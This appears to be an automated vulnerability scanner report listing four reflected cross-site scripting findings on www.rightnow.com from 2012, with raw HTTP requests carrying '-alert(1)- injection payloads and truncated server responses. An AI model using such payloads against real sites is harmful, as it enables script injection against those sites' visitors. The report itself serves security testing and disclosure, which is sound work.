1. Cross-site scripting (reflected)
1.1. http://www.rightnow.com/ [name of an arbitrarily supplied request parameter]
1.2. http://www.rightnow.com/favicon.ico [REST URL parameter 1]
1.3. http://www.rightnow.com/floatbox/floatbox.css [REST URL parameter 1]
1.4. http://www.rightnow.com/floatbox/floatbox.css [REST URL parameter 2]
Severity: High
Confidence: Certain
Host: http://www.rightnow.com
Path: /

    GET /?867f8'-alert(1)-
    Host: www.rightnow.com
    Proxy-Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
    Accept: text/html,application
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*
    Content-Length: 10

    HTTP/1.1 200 OK
    Date: Sun, 08 Jan 2012 02:19:13 GMT
    Server: Apache
    X-Powered-By: PHP/5.1.6
    Set-Cookie: PHPSESSID=j1dgjc0c57
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Type: text/html; charset=UTF-8
    Content-Length: 103937
    ...
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR
    <html xmlns="http://www.w3.org
    <head><!--
    ...[SNIP]...
    jQuery.get('http://www
    {
    c_id: existingRightNowContactID
    page_url: 'http://www.rightnow.com/
    isPremium: '0',
    time: tsTimeStamp
    });
    }
    if(includeOmniture != "no") {
    jQuery.ajaxSetup({async: false});
    jQuery.
    ...[SNIP]...
Severity: High
Confidence: Certain
Host: http://www.rightnow.com
Path: /favicon.ico

    GET /favicon.icoeb533'-alert(1)-
    Host: www.rightnow.com
    Proxy-Connection: keep-alive
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*
    Cookie: PHPSESSID=2v11nguomg
    Content-Length: 10

    HTTP/1.1 404 Not Found
    Date: Sun, 08 Jan 2012 02:20:30 GMT
    Server: Apache
    X-Powered-By: PHP/5.1.6
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Type: text/html; charset=UTF-8
    Content-Length: 39509
    ...
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR
    <html xmlns="http://www.w3.org
    <head><!--
    ...[SNIP]...
    jQuery.get('http://www
    {
    c_id: existingRightNowContactID
    page_url: 'http://www.rightnow.com
    isPremium: '0',
    time: tsTimeStamp
    });
    }
    if(includeOmniture != "no") {
    jQuery.ajaxSetup({async: false});
    jQuery.ge
    ...[SNIP]...
Severity: High
Confidence: Certain
Host: http://www.rightnow.com
Path: /floatbox/floatbox.css

    GET /floatbox777ee'-alert(1)-
    Host: www.rightnow.com
    Proxy-Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
    Accept: text/css,*/*;q=0.1
    Referer: http://www.rightnow.com/
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*
    Cookie: PHPSESSID=2v11nguomg
    Content-Length: 10

    HTTP/1.1 404 Not Found
    Date: Sun, 08 Jan 2012 02:19:03 GMT
    Server: Apache
    X-Powered-By: PHP/5.1.6
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Type: text/html; charset=UTF-8
    Content-Length: 39519
    ...
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR
    <html xmlns="http://www.w3.org
    <head><!--
    ...[SNIP]...
    jQuery.get('http://www
    {
    c_id: existingRightNowContactID
    page_url: 'http://www.rightnow.com
    isPremium: '0',
    time: tsTimeStamp
    });
    }
    if(includeOmniture != "no") {
    jQuery.ajaxSetup({async: false});
    ...[SNIP]...
Severity: High
Confidence: Certain
Host: http://www.rightnow.com
Path: /floatbox/floatbox.css

    GET /floatbox/floatbox.css4e7bf'-alert(1)-
    Host: www.rightnow.com
    Proxy-Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
    Accept: text/css,*/*;q=0.1
    Referer: http://www.rightnow.com/
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*
    Cookie: PHPSESSID=2v11nguomg
    Content-Length: 10

    HTTP/1.1 404 Not Found
    Date: Sun, 08 Jan 2012 02:19:05 GMT
    Server: Apache
    X-Powered-By: PHP/5.1.6
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Type: text/html; charset=UTF-8
    Content-Length: 39519
    ...
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR
    <html xmlns="http://www.w3.org
    <head><!--
    ...[SNIP]...
    get('http://www.rightnow
    {
    c_id: existingRightNowContactID
    page_url: 'http://www.rightnow.com
    isPremium: '0',
    time: tsTimeStamp
    });
    }
    if(includeOmniture != "no") {
    jQuery.ajaxSetup({async: false});
    jQuery.ge
    ...[SNIP]...